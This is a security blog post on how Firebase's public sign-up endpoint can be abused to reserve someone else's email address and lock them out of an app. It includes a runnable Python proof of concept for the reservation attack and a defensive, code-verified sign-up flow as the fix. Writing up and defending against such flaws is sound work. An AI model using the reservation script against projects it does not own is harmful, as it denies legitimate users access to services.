How a Simple Firebase Misuse Can Lock Out Users From Signing Up
In user authentication, making sure email addresses are validated and managed properly is crucial. But what happens when an attacker can abuse a third-party authentication system to "reserve" someone else's email address, blocking the real owner from ever signing up?
That is exactly what this post explores: how misuse of Firebase's email sign-up API can produce a denial-of-service condition for legitimate users.
Understanding the Problem
Firebase Authentication exposes a REST API (the Identity Toolkit API at identitytoolkit.googleapis.com) that apps use to manage users. One endpoint, accounts:signUp, creates a user record from nothing more than an email address and a password. The only credential it needs is the project's web API key, which is not a secret: it is embedded in every mobile and web client, so anyone can call the endpoint directly.
However, there's a catch.
Email verification in Firebase is a separate, optional step that happens after the account already exists. The user record is created the moment signUp succeeds, and because a Firebase project enforces one account per email address by default, that address is "taken" from then on, whether or not anyone ever verifies it. An app that treats "exists in Firebase" as "registered" inherits this behavior.
Now imagine an attacker takes advantage of this and preemptively registers someone else's email address. That is where things get interesting (and dangerous).
Step-by-Step Breakdown
Here’s a general outline of how the abuse works:
1. Identify an unregistered email — The attacker picks a target address that does not yet exist in the app's Firebase project.
2. Use Firebase's public sign-up API — The attacker sends a POST to accounts:signUp with the project's web API key, the victim's email and a random password. No verification step and no access to the victim's mailbox is required.
3. The email is now taken — Firebase now holds a user record for that address, so any further signUp call for it fails with EMAIL_EXISTS, and an app that checks Firebase before onboarding treats the victim as an existing user.
4. Victim tries to sign up — When the real owner later tries to register, they get an error such as "email already in use."
5. They can't log in either — They do not know the attacker's password. In default Firebase, the password-reset email goes to the address itself, so the real owner can often reclaim the account that way; the lockout becomes real when the app hides or disables reset for accounts it considers incomplete, or when the victim simply has no way to know an account was created in their name.
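The steps above, reproduced as an added example (this is not code from the original post). The endpoint, request body and the EMAIL_EXISTS error string are the ones Firebase documents for accounts:signUp; the API key, the email addresses and the FakeFirebase transport used for offline testing are constructed values. Pass a real key and the default live_transport to run it against a project you own.

```python
"""Reservation of an email address via Firebase's accounts:signUp endpoint."""
import json
import urllib.error
import urllib.request

# Documented Identity Toolkit sign-up endpoint; the key is the project's public web API key.
SIGNUP_URL = "https://identitytoolkit.googleapis.com/v1/accounts:signUp"


def live_transport(url, body):
    """POST a JSON body over HTTPS and return (status, parsed JSON), including error bodies."""
    req = urllib.request.Request(
        url,
        data=json.dumps(body).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, json.load(resp)
    except urllib.error.HTTPError as err:
        return err.code, json.load(err)


def sign_up(api_key, email, password, transport=live_transport):
    """Call accounts:signUp. Returns ("created", localId) or ("error", firebase_message)."""
    url = f"{SIGNUP_URL}?key={api_key}"
    body = {"email": email, "password": password, "returnSecureToken": True}
    status, data = transport(url, body)
    if status == 200:
        return "created", data.get("localId")
    return "error", data.get("error", {}).get("message", f"HTTP {status}")


class FakeFirebase:
    """Offline stand-in for a project (assumption: one account per email, no verification gate)."""

    def __init__(self):
        self.users = {}  # email -> password chosen by whoever called signUp first

    def __call__(self, url, body):
        email = body["email"].strip().lower()  # assumed normalisation
        if email in self.users:
            return 400, {"error": {"code": 400, "message": "EMAIL_EXISTS"}}
        self.users[email] = body["password"]
        return 200, {
            "kind": "identitytoolkit#SignupNewUserResponse",
            "localId": f"uid-{len(self.users)}",
            "email": email,
        }


def reservation_scenario(transport, api_key="ASSUMED_WEB_API_KEY"):
    """Attacker registers the victim's address first; the victim's own attempt is rejected."""
    victim_email = "victim@example.com"  # constructed
    attacker = sign_up(api_key, victim_email, "r4nd0m-attacker-pw", transport)
    victim = sign_up(api_key, victim_email, "the-owner's-real-pw", transport)
    return attacker, victim


if __name__ == "__main__":
    print(reservation_scenario(FakeFirebase()))
```

Note that nothing in the request proves control of the mailbox: the attacker never needs to receive or click anything, which is why the verification email Firebase can send afterwards does not undo the reservation.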
Real-World Impact
For the victim this is a lockout: they cannot register, and unless the app's password-reset flow lets them reclaim the record, the only way out is manual intervention by the developers, which does not scale for apps with large user bases.
At scale, this technique could be used to:
Pre-register the addresses of specific high-value users (executives, support staff, partners) before they onboard
Spam or troll sign-up systems
Create friction in user onboarding flows
The attack involves no classic exploit such as XSS or SQL injection. Its real-world consequence, blocking someone from using your service, is still significant, and a single unauthenticated request per victim is all it costs.
Final Thoughts
This vulnerability highlights how even well-documented third-party services like Firebase can be misused in subtle ways. Denial-of-service attacks don't always involve floods of traffic; sometimes a single API call is enough to keep someone out for good. The fix is to make mailbox control a precondition of account creation rather than an afterthought: do not let clients create accounts directly (Firebase lets you disable client-side sign-up in the Authentication user-actions settings, after which the public signUp endpoint rejects the call), and have your backend create the user only after the address has proven it can receive a one-time code or link.
Security isn't just about preventing unauthorized access; it is also about ensuring rightful access for the people who need it.
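A verification-gated sign-up flow of the kind described above, as an added example (not code from the original post). The two hooks are assumptions: send_email would hand off to your mailer, and create_user would wrap firebase_admin.auth.create_user(email=..., password=..., email_verified=True) on the backend. Both are replaced here by in-memory fakes so the example runs offline; the email addresses are constructed.

```python
"""Backend sign-up that creates no user until the mailbox owner presents a one-time code."""
import hmac
import secrets
import time

CODE_TTL_SECONDS = 600   # a code is only good for ten minutes
MAX_ATTEMPTS = 5         # a six-digit code must not be brute-forceable


class VerifiedSignup:
    def __init__(self, send_email, create_user, now=time.time):
        self.send_email = send_email      # assumed hook: (to, text) -> None
        self.create_user = create_user    # assumed hook: (email, password, email_verified) -> uid
        self.now = now
        self.pending = {}                 # email -> {"code", "expires_at", "attempts"}

    def request_code(self, email):
        """Step 1: mail a short-lived code. Nothing is created, and the reply reveals nothing."""
        email = email.strip().lower()
        code = f"{secrets.randbelow(10**6):06d}"
        self.pending[email] = {"code": code, "expires_at": self.now() + CODE_TTL_SECONDS, "attempts": 0}
        self.send_email(email, f"Your sign-up code is {code}")

    def complete(self, email, code, password):
        """Step 2: only a caller who read the mailbox gets an account, with the email marked verified."""
        email = email.strip().lower()
        entry = self.pending.get(email)
        if entry is None:
            return "no_pending_request"
        if self.now() > entry["expires_at"]:
            del self.pending[email]
            return "code_expired"
        entry["attempts"] += 1
        if not hmac.compare_digest(entry["code"], code):
            if entry["attempts"] >= MAX_ATTEMPTS:
                del self.pending[email]   # burn the code rather than let guessing continue
                return "too_many_attempts"
            return "bad_code"
        del self.pending[email]
        uid = self.create_user(email=email, password=password, email_verified=True)
        return ("created", uid)


class Outbox:
    """Fake mailer: records what would have been sent."""
    def __init__(self):
        self.messages = []

    def __call__(self, to, text):
        self.messages.append((to, text))


class FakeUserStore:
    """Fake Admin-SDK user store enforcing one account per email."""
    def __init__(self):
        self.users = {}

    def __call__(self, email, password, email_verified):
        if email in self.users:
            raise ValueError("EMAIL_EXISTS")
        uid = f"uid-{len(self.users) + 1}"
        self.users[email] = {"password": password, "email_verified": email_verified}
        return uid


def demo():
    """Attacker requests a code for the victim's address but never sees it; the owner does."""
    outbox, store = Outbox(), FakeUserStore()
    flow = VerifiedSignup(outbox, store)
    victim_email = "victim@example.com"  # constructed

    flow.request_code(victim_email)                    # attacker triggers the mail
    real_code = outbox.messages[-1][1].split()[-1]     # only the mailbox owner can read this
    wrong_code = "000000" if real_code != "000000" else "000001"
    attacker = flow.complete(victim_email, wrong_code, "attacker-pw")
    owner = flow.complete(victim_email, real_code, "owner-pw")
    return attacker, owner, store.users


if __name__ == "__main__":
    print(demo())
```

Two details matter in practice: the attempt counter, because a six-digit code with unlimited guesses would just move the problem, and rate-limiting request_code per address so the attacker cannot turn it into a mail-bombing tool. Since the Firebase record is created server-side with email_verified=True, the app never has an unverified account occupying someone else's address.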